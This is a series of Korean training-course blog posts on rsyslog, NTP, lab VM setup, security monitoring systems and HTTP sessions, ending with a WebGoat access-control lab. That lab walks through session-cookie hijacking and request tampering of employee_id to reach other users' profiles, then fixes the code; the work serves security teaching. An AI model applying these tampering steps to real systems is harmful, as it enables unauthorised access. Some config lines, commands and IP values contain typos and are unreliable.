  - warning, warn : 주의가 필요한 경고 메시지(무시해도 됨)
  - error, err : 처리가 필요한 에러 메세지. 소프트웨어 상에서 발생하는 오류 메시지
    - crit : 크게 급하지는 않지만 시스템에 문제가 생기는 단계의 메시지. 하드웨어 장치에 문제가 발생 시 생성
    - alert : 즉각적인 조정을 해야하는 상황에서 발생하는 에러 메세지. 시스템 DB에 손상 등 즉시 수정해야되는 상황
    - emerg, panic : 모든 사용자들에게 전달되는 패닉 상황. 블루스크린, 커널 패닉 등에서 발생
action : 로그 기록 위치
- 종류
  - file : 로그를 기록할 지정 파일
  - @host : 로그를 전달할 호스트
  - user : 지정한 사용자가 로그인한 경우 해당 사용자의 터미널로 전달
  - * : 현재 로그인되어 있는 모든 사용자의 화면으로 전달
  - 콘솔 또는 터미널 : 로그를 전달할 터미널

만약 kern.err 일 때 소프트웨어적인 이슈 뿐만 아니라 하드웨어 적인 부분도 기록한다. 왜? 일종의 계층이기 때문에 err 만 포함하지 않고 err 이후의 문제까지 모두 기록한다. `err, crit, alert, emerg 까지

💡 데몬이란? 백그라운드에서 돌아가는 프로세스

4. rsyslog 전송 및 수신 실습

실습환경구성(우분투, CentOS, Win10 설치) NTP 서버와 클라이언트 동기화 실습

4.1. Server - SplunkServer

rsyslog에 로그 규칙 설정

# rsyslog 설치 확인
$ dpkg -l *rsyslog*

nano 편집기로 rsyslog 설정 파일 열기

$ nano /etc/rsyslog.conf

원격으로 오는 로그를 /var/log/192.168.10.0/client.log 에 기록

template remote-incoming-logs, "/var/log/192.168.10.0/client.log .?remote-incoming-logs

rsyslog.conf 에서 마지막 10줄 출력

$ tail /etc/rsyslog.conf


![](https://velog.velcdn.com/images/p-jina/post/43c9e5b2-6e4c-4feb-85ca-1a5fd5021028/image.png)

2. 방화벽 설정하기
```shell
$ ufw allow 514/tcp

rsyslog 재시작 후 상태확인

# rsyslog 재시작
$ systemctl restart rsyslog

rsyslog 상태확인

$ systemctl status rsyslog

rsyslog 자동실행 설정

$ systemctl enable rsyslog

![](https://velog.velcdn.com/images/p-jina/post/d79dbf2c-8d44-430f-9686-4a0138475899/image.png)

4. /var/log/192.168.10.0 디렉토리에 client.log 생성됐는지 확인

![](https://velog.velcdn.com/images/p-jina/post/f9b8bddb-41c0-417d-9f7c-20f4d48f210d/image.png)

![](https://velog.velcdn.com/images/p-jina/post/cc42dca0-4edb-4db5-8426-a6be6d37ebe1/image.png)

5. TCP를 통해 로그 메세지를 수신하는 방법 부분 주석 제거

![](https://velog.velcdn.com/images/p-jina/post/50c68cd6-c21f-418f-887e-a008ccca93ba/image.png)

### 4.2. Client -  ZeekIDS
1. rsyslog.conf에 전송할 로그와 전송 방식 설정
시스템에서 발생하는 모든 종류의 로그를 192.168.10.10:514로 TCP를 이용해 전송
```shell
$ nano /etc/rsyslog.conf

*.*@@192.168.10.10:514 # tcp 방식 전송하는 경우
*.*@192.168.10.10:514 # udp 방식 전송하는 경우

rsyslog 재시작 후 상태확인

# rsyslog 재시작
$ systemctl restart rsyslog

rsyslog 상태확인

$ systemctl status rsyslog

rsyslog 자동실행 설정

$ systemctl enable rsyslog

![](https://velog.velcdn.com/images/p-jina/post/5ed385a8-47c0-45f4-8a0c-b3df9eb0a682/image.png)


### 4.3. Client - WebServer
1. rsyslog.conf에 전송할 로그와 전송 방식 설정
시스템에서 발생하는 모든 종류의 로그를 192.168.10.10:514로 TCP를 이용해 전송
```shell
$ gedit /etc/rsyslog.conf

*.*@@192.168.10.10:514 # tcp 방식 전송하는 경우
*.*@192.168.10.10:514 # udp 방식 전송하는 경우

rsyslog 재시작 후 상태확인

# rsyslog 재시작
$ systemctl restart rsyslog

rsyslog 상태확인

$ systemctl status rsyslog

rsyslog 자동실행 설정

$ systemctl enable rsyslog

![](https://velog.velcdn.com/images/p-jina/post/e307db60-f6f9-4ea0-8051-88bd9c8d3eed/image.png)

3. rsyslog가 포함된 네트워크 연결 확인 및 514포트인 네트워크 연결 확인
```shell
$ netstat -natip | grep rsyslog
$ lsof -i tcp:514

4.4. Server에서 수신 확인

# 로그가 저장된 디렉토리로 이동
$ cd /var/log/192.168.10.0

# client.log에 저장된 기록 중 호스트명이 ZeekIDS인 것만 보기
$ cat client.log | gerp ZeekIDS

# client.log에 저장된 기록 중 호스트명이 WebServer 인 것만 보기
$ cat client.log | gerp WebServer

5. 과제

/etc/rsyslog.conf 에 시스템 부팅되거나 종료되면 로그 작성하는 규칙 작성
```
# /etc/rsyslog.conf
```

daemon,mail.;
news.=crit;news.=err;news.=notice;
*.=debug;.=info;
.=notice;.=warn /var/log/boot.log


2. rsyslog 재시작 및 상태 확인
```shell
# rsyslog 재시작
$ systemctl restart rsyslog

# rsyslog 상태확인
$ systemctl status rsyslog

작성된 로그 확인
```
$ cat /var/log/boot.log
```

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] NTP 서버와 클라이언트 동기화 실습

Thu, 04 Jan 2024 07:08:57 GMT

이전 시간에 실습환경구성을 마쳤다.

1. NTP(Network Time Protocol)

1.1. 정의

네트워크 시간 동기화 서비스를 제공하는 프로토콜
UDP 123번 포트 사용
NTP 서버들에 대한 정보 제공 🔗

1.2. 시간 동기화 목적

백업이나 패치 등 예약한 작업들이 실행되지 않는 것 방지
로그에 대한 신뢰도 - 언제 어떤 작업을 했는지 보여주는 로그의 시간은 정확해야한다.
보안, 암호화 인증 프로토콜 과정 시 timestap 및 lifetime이 추가되기 때문에 - 이때 서버와 클라이언트의 시간이 일치하지 않으면 서비스에 접근을 차단당한다.

1.3. Stratum

세계 표준 시간 Atomic clocks에서 얼마나 멀리 떨어져있는지를 나타내는 것.
시간을 전송해주는 서버

2. 설치

1단계. 프로그램 설치 2단계. 환경설정 - /etc 3단계. 방화벽 설정 4단계. 서비스 활성화 5단계. 서비스 상태확인

2.1. Server - SplunkServer(Ubuntu)

리포지토리 인덱스 업데이트 및 NTP서버 설치
```
$ apt update
$ apt-get install -y ntp
$ sntp --version
```
가장 가까운 NTP server pool로 전환 https://www.ntppool.org/zone/kr 기존에 있는 설정은 주석처리 후 임의 서버들로 지정

NTP 서버 재시작 및 실행상태 확인
```
$ service ntp restart
$ service ntp status
```
클라이언트가 NTP 서버에 접근할 수 있도록 방화벽 구성
```
$ ufw allow from any to any port 123 proto udp
$ ufw enable
$ ufw status
```

ufw에서 중복된 규칙 삭제하는 방법

# 규칙에 번호 확인하기
$ ufw status numbered
# ufw delete 삭제하려는 규칙 번호
$ ufw delete 4

현재 동기화중인 NTP 서버정보 확인
```
$ ntpq -p
```

remote
- * : 지금 동기화하고 있는 NTP 서버 IP
- + : 동기화가 가능한 Second NTP 서버 IP
- 공백 또는 - : 접속이 불가한 IP
refi
st: 스트라텀(Stratum)
t: 시간을 받아들이는 방식(Unicast / Broadcast / Multicast 3가지 방식이 존재함)

현재 내 SplunkServer에서 동기화 하고 있는 서버 IP는 185.125.190.58 인 것을 확인할 수 있다. 만약 이 서버에 문제가 생기면 + 표시가 되어 있는184.125.190.56 이나 alphyn.canonica 서버가 대신 동기화를 수행하게 된다.

# 현재 시스템의 날짜와 시간을 RFC 2822 형식으로 출력
$ date -R

# 현재 날짜, 시간, 타임존, 타임 서버와의 동기화 여부를 모두 출력 
$ timedatectl

2.2. Client - ZeekIDS(Ubuntu)

ntpdate 설치 및 리눅스 시간을 timeserver와 동기화하기
```
$ apt-get install ntpdate
```
호스트 파일에 NTP 서버 IP 및 호스트 이름 지정

NTP 서버와 시간을 동기화하기
```
$ ntpdate splunk-server
```

systemd timesyncd 서비스 활성화

# 시스템 시간(리눅스 커널 시간이나 소프트웨어 시간) 동기화 활성화
$ timedatectl set-ntp true

동기화된 시간 확인

# 현재 시스템의 날짜와 시간을 RFC 2822 형식으로 출력
$ date -R

현재 날짜, 시간, 타임존, 타임 서버와의 동기화 여부를 모두 출력

$ timedatectl

![](https://velog.velcdn.com/images/p-jina/post/8bb81267-abc4-49a0-99c9-b9ab3d894896/image.png)

### 2.3. Client - WebServer(CentOS)

CentOS는 chrony가 기본적으로 설치되어 있기 때문에 ntp를 설치하지 않아도 된다.

> **chrony란?**
- 레드햇 계열의 리눅스 기본 시간 동기화 프로그램 
- 레드햇 엔터프라이즈 리눅스 8부터 기본 시간 동기화 프로그램으로 채택
- CentOS 8 chrony 를 기본 시간 동기화 프로그램으로 사용
- Chrony는 기본설치가 되어 있어서 CentOS 8에서 별도 설치하지 않고 사용 가능
#### chrony 설치 확인 명령어
```shell
# RPM 패키지 데이터베이스에서 chrony 패키지 검색
$ rpm -qa | grep chrony

chrony 사용법

설정 파일에서 해당 지역의 NTP 서버 등록
chrony 서비스 재시작
시간 동기화 적용 확인 및 NTP 서버 동작 확인

호스트 파일에 NTP 호스트명 등록
```
# 관리자 모드
$ su
```

hosts 파일 편집기로 열기

$ gedit /etc/hosts

![](https://velog.velcdn.com/images/p-jina/post/232ffffd-d88d-4162-ab70-2ec8e5b3b51a/image.png)

2. chrony 설정 파일에 NTP 서버 등록
```shell
$ gedit /etc/chrony.conf

chronyd 서비스 활성화 상태 확인

# chronyd 재시작
$ systemctl restart chronyd

chronyd 상태 확인

$ systemctl status chronyd

![](https://velog.velcdn.com/images/p-jina/post/174af0f4-75a1-49b5-a365-ded0765382c0/image.png)

```shell
# chronyc 데몬 서비스로 현재 사용중인 NTP 소스 서버 상태 표시
$ chronyc sources -v

2.4. Client - Sysmon(Win10)

호스트 파일에 NTP 서버 호스트 등록 CMD창을 관리자 권한으로 실행
```
$ cd C:\Windows\System32\drivers\etc
$ notepad hosts
```
NTP 서버 시간과 동기화 시키기

동기화 상태 확인
```
$ w32tm /query /status
```

$ w32tm /dumpreg / subkey:parameters

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] 실습환경구성(우분투, CentOS, Win10 설치)

Thu, 04 Jan 2024 02:06:14 GMT

실습 환경 구성

네트워크 설정

이름	주소	넷마스크	게이트웨이
SplunkServer	192.168.10.10/24	255.255.255.0	192.168.10.2
ZeekIDS	192.168.10.20/24	255.255.255.0	192.168.10.2
WebServer	192.168.10.30/24	255.255.255.0	192.168.10.2
Sysmon	192.168.10.40/24	255.255.255.0	192.168.10.2

1. 우분투 설치

사용한 이미지는 ubuntu-20.04.1-desktop-amd64.iso

[Splunk]

Processors: 2 / 2
Memory for this virtual machine: 4096MB
Use network address translation (NAT)
LSI Logic
SCSI
Create a new virtual disk
Maximum disk size: 40GB
Store virtual disk as a single file

[Edit Virtual Machine]

Network Adapter - Custom: Specific virtual network: VMnet8(NAT)
CD/DVD (SATA) - Use ISO image file: 우분투 이미지 선택

우분투 해상도 조정

Ubuntu 설치

바탕화면에서 Install Ubuntu 20.04 LTS 더블 클릭 모두 기본 설정으로 설치 진행한다.

splunk / 1234

동일 방식으로 우분투 가상머신 추가로 생성한다.

[ZeekIDS]

Processors: 2 / 1
Memory for this virtual machine: 2096MB
Use network address translation (NAT)
LSI Logic
SCSI
Create a new virtual disk
Maximum disk size: 40GB
Store virtual disk as a single file

[Edit Virtual Machine]

Network Adapter - Custom: Specific virtual network: VMnet8(NAT)
CD/DVD (SATA) - Use ISO image file: 우분투 이미지 선택

zeekids / 1234

네트워크 설정

저장소 변경

Splunk & ZeekIDS 동일하게 진행

$ sudo su -
# Ubuntu 저장소 주소 기록 파일 위치 
$ cd /etc/apt
$ mv sources.list sources.list.bak
$ vi sources.list

# sources.list 내용으로 아래 내용 복사해서 붙여넣기
# 기존에 우분투 공식사이트의 패키지를 사용하고 있었으나 카카오의 저장소를 쓰겠다고 결정한 것
# 내 저장소와 카카오의 저장소를 비교에서 없는 패키지는 설치가 진행된다.
deb http://ftp.daumkakao.com/ubuntu/ focal main
deb http://archive.ubuntu.com/ubuntu/ focal main

deb http://ftp.daumkakao.com/ubuntu/ focal universe
deb http://archive.ubuntu.com/ubuntu/ focal universe

deb http://ftp.daumkakao.com/ubuntu/ focal multiverse
deb http://archive.ubuntu.com/ubuntu/ focal multiverse

deb http://ftp.daumkakao.com/ubuntu/ focal restricted
deb http://archive.ubuntu.com/ubuntu/ focal restricted

# 패키지 업데이트
$ apt update

IP 확인

$ sudo su - 
$ apt install -y net-tools

$ ifconfig

만약 내가 설정한대로 IP주소가 변경되지 않는다면 VMware > Edit > Virtual Network Editor 에서 Use local DHCP service to distribute IP address to VMs 항목이 체크되어 있는지 확인하기! 체크되어 있으면 체크 해제!

2. CentOS 7 설치

[WebServer]

Processors: 2 / 1
Memory for this virtual machine: 4096MB
Use network address translation (NAT)
LSI Logic
SCSI
Create a new virtual disk
Maximum disk size: 20GB
Store virtual disk as a single file

[Edit Virtual Machine]

Network Adapter - Custom: Specific virtual network: VMnet8(NAT)
CD/DVD (SATA) - Use ISO image file: CentOS 7 이미지 선택

소프트웨어 선택

시스템 설치 대상

네트워크 설정

IP 주소: 192.168.19.30 Subnet mask: 255.255.255.9 Gateway: 192.168.10.2

ROOT 암호 1234

사용자 생성

설치 완료 후 Kdump 비활성화

IP 확인

$ sudo su -
$ ifconfig

저장소 변경

# CentOS 저장소 주소 기록 파일 위치
$ cd /etc/yum.repos.d

# CentOS 패키지 업데이트
$ yum update

3. Win10 설치

[Sysmon]

Microsoft Windows
Version: Windows 10 x64
BIOS
Processors: 2 / 1
Memory for this virtual machine: 4096MB
Use network address translation (NAT)
LSI Logic
SCSI
Create a new virtual disk
Maximum disk size: 20GB
Store virtual disk as a single file

[Edit Virtual Machine]

Network Adapter - Custom: Specific virtual network: VMnet8(NAT)
CD/DVD (SATA) - Use ISO image file: Win10 이미지 선택

설치유형: 사용자 지정 (Window만 설치)

네트워크 설정

IP 주소: 192.168.10.40/24 Subnet mask: 255.255.255.0 Gateway: 192.168.10.2 DNS 주소도 Gateway랑 동일

IP 확인

$ ipconfig

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] 보안관제 시스템 종류와 Network Maintenance Tools, TAP

Wed, 03 Jan 2024 04:25:08 GMT

보안관제 시스템

1. NMS (Network Management System)

1.1. 관리대상

네트워크 장비(스위치, 라우터 외 보안장비 VPN, IP, FW, DNS)

1.2. 관리항목

구성관리(환경설정, 장비초기)
성능관리
- 시스템들의 상태 정보를 수신받아 해당 장비의 상태 파악
- 관리 항목
  1. CPU, 메모리에 대한 사용률(평균값, 최대값) 측정 및 분석
  2. 장비별, 지역별, 기간별(시간별, 일별, 주간별, 월별)로 측정 및 분석
  3. 임계치 관리 방식에 따른 정보체계 구축 및 관리 (※ 단, 장비의 소프트웨어적인 문제는 배제한다.)
장애관리 - 로그나 정보로 확인
보안정비
계정관리 - 과금, 이용량에 따른 요구 부하

1.3. 운영을 위해 사용되는 프로토콜

SNMP, CMIP, RMON 등 ⇒ 여기서 행식 프로토콜은 SNMP 이다.

1.4. EMS(Element Management System)

통신망 장비를 네트워크를 통해 감시 및 제어할 수 있는 시스템
EMS는 서브네트워크를 관리
상위계층인 NMS로부터의 요구 수행
관리대상인 NE(Network Element)들을 제어
관리대상에 에이전트를 설치해서 중앙에서 관제

2. SMS (Server Management System)

서버 관리 시스템
이기종 다양한 서버들의 성능/장애 통합 감시 및 조치하기 위함

2.1. 관리대상

PC의 운영체제, 애플리케이션(서버 급, 클라이언트용)
SMS 또한 Agent 프로그램이 각 시스템에 설치되어야 할 수 있다.

2.2. 관리항목

성능(CPU, RAM, 처리율), 로그, 프로세스 상태점검

NMS와 SMS의 공통점과 차이점

공통점:
- 둘다 CPU와 Memory를 관리
차이점
- NMS는 네트워크 장비를 대상으로 한다.
- SMS는 EndUser가 사용하는 PC를 대상으로 할 수 있고, 그 외 CPU와 Memory 뿐만 아니라 디스크 사용률, 프로세스, 네트워크 트래픽, 디스트I/O 등의 성능도 추가적으로 감시한다.

3. ESM (Enterprise Security Management)

통합보안 관제 시스템 = 기업 보안관리 시스템 = 통합보안 관리 시스템 = 전사적 보안관리 시스템

3.1. 관리대상

NMS와 SMS의 결합

3.2. 구조

Manager - Agent - Console

3.3. 주요기능

서로 다른 기종의 보안장비들을 통합 관리 기능(SMS)
네트워크 자원현황을 모니터링하는 보안 모니터링 기능(NSM)
- 각 장비에 ESM Agent 가 설치되어야 관제가 가능하다.

3.4. 프로세스

ESM Manager 를 통해 정책 설정
1. ESM Agent를 통해 배포
2. ESM Agent는 정책에 맞는 로그를 이벤트 저장소, 위험 패턴 저장소에 저장 ⇒ 저장소에 저장된 로그를 통해 관리자는
  - 대응 방안 마련(실시간 대응)
  - 새로운 정책 수립(사후 대응)

4. SIEM (Security Information & Event Management)

보안 정보와 이벤트 관리해주는 솔루션
ESM의 진화형태로 기능은 ESM과 같다.

4.1. ESM과 SIEM의 차이점

ESM :
- 데이터 수집량 : 이벤트 위주 단시간(최대1일) 위협분석
- 데이터 형태 : 정형 테이터
- 초당 3천건 내외 수집/분석 포함
- 고가의 유닉스 서버 시스템
SIEM :
- 데이터 수집량 : 빅데이터 수준의 장기간(수개월) 심층분석
- 데이터 형태 : 정형, 비정형, 세미정형까지
- 초당 3만~5만건 이상 수집/분석 ⇒ RDBMS 기반의 처리 속도 지역 극복
- 저가의 리눅스 x86 시스템 - 저용량 하드웨어가

4.2. SIEM을 이용한 세대별 관제 시스템

1세대 (단위보안관제)
2세대 (통합보안관제)
3세대 (빅데이터보안관제)
- 빅데이터 기반 관제
- SIEM 기반 보안관제
4세대 (차세대보안관제)
- 머신러닝(AI)기반 이상행위 탐지
- 소아(SOAR) 기반 자동화 대응
  4.3. 주요 기능
  1. 다양한 이기종 장비에서 발생하는 로그를 통합 수집하고 분석
  2. 로그 분석
    4.4. 구조
  3. 애플리케이션이서 생성된 로그를 수집
  4. 수집된 로그를 분석
  5. 상호연관관계를 파악해서 이미지로 보거나(View), 레포트를 제출하거나(Report), 새로운 정책을 수립한다.

4.5. 처리 프로세스

1단계. 데이터 통합

로그 수집(Collection): 관제 대상의 Agent, SNMP, Syslog 서버로부터 로그 수집
- 로그 정규화(일반화)와 필터링 ⇒ 정규화하는 이유? 장비마다 로그가 다르기 때문에 일반화한다. ⇒ 불필요한 데이터 제거
  2단계. 상관관계 분석
- 로그 분류 ⇒ 로그들 간의 상관관계 분석
- 로그 분석 ⇒ 위험탐지(시그니처 기반 탐지, 이상징후 탐지)
  3단계. 알림
- 관리자에게 대응할 수 있도록 알림
  4단계. 기록
- 대시보드(⇒ Splunk를 사용하는 이유)표시 또는 보고서 작성
- 패턴 표시
- 활동파악

4.6. IDS와 SIEM의 차이점

IDS는 실시간으로 트래픽을 수집해서 분석
- 실시간 트래픽: MAC주소, IP주소, 포트번호, 데이터
SIEM은 로그를 수집해서 분석
- 트래픽을 통해 로그가 생성
- 로그 구성: 시간정보 / 호스트 정보 / 프로세스 정보

Network Maintenance Tools

1. NTP(Network Time Protocol)

시간동기화 프로토콜
UDP 123번 포트 사용
2. SNMP(Simple Network Management Protocol)

2.1. 기능
성능관리(네트워크 사용량, 처리속도, 오류율)
장비관리(CPU/Memory/Disk 사용률)
네트워크 구성관리(구성 확인)

하나하나가 Object ⇒ Object 정보를 모은 것 MIB

2.2. 특징

망에서의 중앙관제
Manger 와 Agent 로 구성
- Manager: UDP 162번 포트 사용
- Agent: UDP 161번 포트 사용

2.4. 통신명령어

Set Request: 로그를 작성하도록 설정
Get Request: 기록된 로그를 요청
Trap: 위험탐지 시 Manager 가 요청하지 않아도 Agent 측에서 보내는 알림

3. Syslog

3.1. 기능

Local에서 한 시스템의 로그를 체계적으로 관리

3.2. 동작 방식

환경설정 파일 /etc/syslog_conf /etc/rsyslog.conf 에서 설정

SNMP와 Syslog의 차이점 SNMP는 정책에 맞는 로그를 저장하고, Manager의 요청에 따라 제공 Syslog는 Local에서 로그를 수집에서 요청없이 제공

TAP(Test Access Port)

4.1. Network TAP

가장 기본적인 TAP
단일 네트워크 링크에서 패킷 데이터를 복제하고 모니터링 장비로 전달

2. Aggregation TAP

여러 네트워크 링크의 패킷 데이터를 모아서 복제하고 집계하여 다양한 모니터링 장치로 전달
네트워크 상황을 종합적으로 분석하는 데 사용

3. ByPass TAP(=ByPass Switch)

ByPassTap 나 IDS/IPS 에서 문제가 일어나면 Switch로 전환되어, Forwading 되도록 한다.

💡 Network TAP과 ByPass TAP의 차이점 Network TAP은 트래픽 흐름을 제어할 수 없고, ByPass TAP은 트래픽 흐름을 제어할 수 있다.

[SK shieldus Rookies 16기][git] Git으로 협업하는 방법

Wed, 27 Dec 2023 04:29:38 GMT

🏢 협업 용 단체

Github > Settings 아이콘 클릭 > Your organizations

단체를 만들어가 현재 포함되어 있는 단체 확인 가능

🔗 작업 디렉토리를 Git 저장소에 연결

복사할 레포지터리 URL 복사

$ git clone [레포지터리 주소]
$ git branch -M main
$ git add .
$ git commit -m "commit"
$ git push origin main

[SK shieldus Rookies 16기][취약점 진단] HTTP의 개요, 쿠키와 세션, Access Control 실습

Fri, 22 Dec 2023 04:02:21 GMT

1. HTTP

1.1. 정의

WWW에서 정보를 주고 받을 수 있는 프로토콜
클라이언트-서버 프로토콜

1.2. HTTP 특징

요청, 응답 구조
- HTTP는 반드시 요청을 해야 응답을 준다.
Stateless
- 상태를 유지 하지 않기 때문에 요청과 요청 간의 관계를 알 수 없다.
- 과거 70년도 에는 연결을 유지할 필요가 없었다. HTTP를 통해 데이터 시점, 서버 성능을 고려했을 때 Stateless가 효율적이었다. 시간이 지남에따라 연결 유지의 필요해졌다. StateFull 하기 위해서 Cookie 가 등장했다.
확장성
TCP/IP 기반

# WebGoat URL로 HTTP 요청을 보내는 명령어
$ curl -v http://victim:8080/WebGoat

상호 합의 하에 연결을 하고, 4whs을 통해 연결을 종료한다.

# WebGoat URL로 HTTP 요청을 보내는 명령어
$ curl -v http://victim:8080/WebGoat

# WebGoat URL로 HTTP 요청을 보내는 명령어
# Basic 인증을 사용하여 WebGoat 리소스 정보를 요청
$ curl -v http://victim:8080/WebGoat/ -H "Authorization: basic d2ViZ29hdDp3ZWJnb2F0"

1.3. 리다이렉션

1.4. 기본인증(Basic Authenticate)

WWW-Authenticate: Basic realm="WebGoat Application"

인코딩 방식으로 전달
안전하지 않다. 왜? 매번 요청할 때마다 요청방식을 전달해야하기 때문에 ⇒ 안전하기 위해서는 Form 기반으로 전달해야 한다.

정의 Stateless한 HTTP 프로토콜에서 상태를 유지하기 위해 도입된 개념
단점
- 요청 헤더와 응답 헤더를 통해 전달되므로 전달 과정에서 탈취 및 도용될 수 있다.
- 로컬PC 브라우저에 저장되고 JavaScript를 이용해서 쉽게 접근이 가능하므로 쉽게 탈취 및 위조, 변조, 도용될 수 있다.
안전하게 Cookie 운영하는 방법
- 가급적 중요한 정보는 쿠키에 포함 X
- 중요한 정보를 쿠키에 포함해야하는 경우 쿠키 암호화
- 쿠키 유효기간 또는 지속시간을 최소한으로 설정
- 쿠키 생성 시 secure 속성 활성화
  - secure 속성이란? 보안 통신을 할 때만 쿠키 전달하도록 제한
- 쿠키 생성 시 HttpOnly 속성 설정
  - HttpOnly 속성이란? 클라이언트에서 쿠키에 JavaScript나 개발자 도구를 이용해 직접 접근을 제한하는 것
실습 실습을 위해서 Tomcat v7.0 Server의 context.xml 파일에서 태그에 useHttpOnly="false" 를 추가해줘야 한다. HttpOnly 속성이 true면 클라이언트에서 접근 시 " " 만 나온다. HttpOnly 속성이 제거(uncheck) 된 것을 확인할 수 있다. openeg에서 같은 계정으로 로그인해 각각 크롬와 파이어폭스에서 쿠키 값을 확인해보면 서로 다른 것을 확인할 수 있다. 왜? 각 브라우저는 자체 쿠키 저장소를 갖고 있기 때문에

로그인한 브라우저의 쿠키값을 추출해서 로그인하지 않은 브라우저에 설정 후 새로고침 ⇒ 서버는 세션 ID를 이용해서 사용자를 식별하는데, 세션 ID가 포함되어 있는 쿠키를 탈취 당하게 되면, 서버를 속여서 접근이 가능하게 됨

1.6. Session

정의
- 쿠키의 단점을 보안하기 위해 나온 개념
- 중요 정보를 서버의 세션에 저장하고, 사용자에게는 해당 세션에 접근할 수 있는 세션 ID를 발급
단점
- 중요 정보에 대한 직접적인 유출은 막을 수 있으나, 중요 정보 접근에 사용되는 세션 ID 발급 및 관리가 중요해진다.
발생할 수 있는 문제점
- 세션 ID 고정 : 인증 전후에 동일한 세션 ID를 사용하는 경우 발생
- 세션 ID 훔치기 : 세션 ID가 요청, 응답을 통해서 전달되는 과정 또는 사용자 PC, 브라우저에 저장된 것을 탈취, 조작할 수 있을 때 발생
- 세션 ID 추측 : 세션 ID의 생성 규칙을 유추할 수 있는 경우 발생
  1. 공격자가 다음에 생성될 세션 ID를 미리 설정
  2. 불특정 다수의 희생자에게 동일한 세션 ID가 발급되기를 대기
  3. 동일한 세션 ID를 발급받은 희생자가 생기면 공격자는 희생자의 권한으로 사이트 이용
⇒ 세션 ID를 발급, 관리를 잘못한 경우

실습문제1 - Stage 1

WebGoat > Access Control Flaws > LAB:Role Based Access Control

1. 목표

Employee Tom으로 Staff Listing Page에서 Tom의 프로필 삭제하기

2. 로그인해서 소속에 따른 페이지 확인하기

Tom(pw : tom) 로그인한 경우

Jerry(pw: jerry) 로그인한 경우

3. Jerry 로그인 상태에서 DeleteProfile 해보기

4. Tom 로그인 상태에서 Tom 프로필 삭제하기

ViewProfile > Tom employee_id=106 확인

SearchStaff 클릭 후 패킷 Intercept

employee_id, action을 변경

5. 성공하면 Stage 2: Add Business Layer Access Control 로 이동

실습문제2 - Stage 2

1. 목적

요청한 사용자의 권한 여부를 체크하는 로직을 추가하기

2. 소스 코드 분석

RoleBasedAccessContol.java

public void handleRequest(WebSession s)
    {
        // Here is where dispatching to the various action handlers happens.
        // It would be a good place verify authorization to use an action.

        // System.out.println("RoleBasedAccessControl.handleRequest()");
        if (s.getLessonSession(this) == null) s.openLessonSession(this);

        String requestedActionName = null;
        try
        {
            // action 요청 파라미터 값을 추출
            requestedActionName = s.getParser().getStringParameter("action");
        } catch (ParameterNotFoundException pnfe)
        {
            // Let them eat login page.
            requestedActionName = LOGIN_ACTION;
        }
        // System.out.println("Requested lesson action: " + requestedActionName);

        try
        {
            DefaultLessonAction action = (DefaultLessonAction) getAction(requestedActionName);
            if (action != null)
            {
                // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
                // action.getActionName());
                if (!action.requiresAuthentication())
                {
                    // Access to Login does not require authentication.
                    action.handleRequest(s);
                }
                else
                {
                    // ***************CODE HERE*************************

                    // *************************************************
                    // 인증 여부 확인
                    if (action.isAuthenticated(s))
                    {
                        // 요청 처리
                        action.handleRequest(s);
                    }
                    else
                        // 인증 오류 반환
                        throw new UnauthenticatedException();
                }
            }

           ...(생략)...

요청한 사용자의 권한 여부를 확인하지 않고, 인증 여부만 확인하고 요청을 처리하고 있다는 것을 확인할 수 있다.

3. 요청한 사용자의 권한 여부를 체크하는 로직을 추가하기

//
public void handleRequest(WebSession s)
    {
        // Here is where dispatching to the various action handlers happens.
        // It would be a good place verify authorization to use an action.

        // System.out.println("RoleBasedAccessControl.handleRequest()");
        if (s.getLessonSession(this) == null) s.openLessonSession(this);

        String requestedActionName = null;
        try
        {
            requestedActionName = s.getParser().getStringParameter("action");
        } catch (ParameterNotFoundException pnfe)
        {
            // Let them eat login page.
            requestedActionName = LOGIN_ACTION;
        }
        // System.out.println("Requested lesson action: " + requestedActionName);

        try
        {
            DefaultLessonAction action = (DefaultLessonAction) getAction(requestedActionName);
            if (action != null)
            {
                // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
                // action.getActionName());
                if (!action.requiresAuthentication())
                {
                    // Access to Login does not require authentication.
                    action.handleRequest(s);
                }
                else
                {
                    // ***************CODE HERE*************************

                    // *************************************************
                    /* 기존 코드 주석처리
                    if (action.isAuthenticated(s))
                    {
                        action.handleRequest(s);
                    }
                    else
                        throw new UnauthenticatedException();
                    */
                    // ********************추가*******************
                    // 요청 사용자의 인증 여부를 확인
                    if (action.isAuthenticated(s)) {
                        // 요청 사용자의 요청 권한 여부를 확인
                        // isAuthorized(WebSession s, int employeeId, String functionId)
                        if (action.isAuthorized(s, action.getUserId(s), action.getActionName())) {
                            action.handleRequest(s);
                        } else {
                            // 권한 오류
                            throw new UnauthorizedException();
                        }
                    } else {
                        // 인증 오류
                        throw new UnauthenticatedException();
                    }
                }
            }
            else
                setCurrentAction(s, ERROR_ACTION);
                        // ****************************************

4. 결과 확인

코드 수정 후 Stage 2에서 Stage 1과 동일하게 실습 진행 시 DeleteProfile 요청이 처리되지 않는 것을 확인할 수 있다.

실습문제3 - Stage 3

1. 목적

Tom으로 다른 직원의 프로필 조회하기

2. Tom으로 로그인한 상태로 ViewProfile 패킷 확인

3. employee_id를 Jerry의 id로 변경 후 결과 확인

Stage 4로 이동되어야 한다.

실습문제4 - Stage 4

예상 쿼리

SELECT * FROM employee WHERE employee_id=사원번호

목록 조회 : 비슷한(동일) 유형의 데이터(레코드)가 나열되는 형식
상세 조회 : 하나의 데이터(레코드)의 구성요소가 출력되는 형식
목록 데이터에서 해당 레코드를 유일하게 식별할 수 있는 값 = 유일 키

😨 유일키만으로 데이터를 조회하는 경우 파라미터를 조작하면 목록에 나오지 않는 데이터의 열람이 가능해진다.

그렇기 때문에 목록 조회 기능을 구현할 때는 다양한 조건절을 추가해야한다.

검색어
정책 (예: del_yn 컬럼의 값이 'Y'인 데이터는 조회에서 제외)
권한 (예: 로그인한 사용자와 동일한 전공인 학생만 조회하도록 제한)

상세 조회 기능 구현 시 목록 조회에서 적용한 조건과 레코드를 선택하기 위한 조건을 함께 사용해야 한다.

1. 목적

기존에는 hr 소속이 아니었어도 employee_id만 변경하면 프로필 조회가 가능했었다.

hr 소속이 아니면 프로필 조회를 못하게 소스코드 변경하기

2. 소스코드 확인

WebGoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java

ViewProfile.java

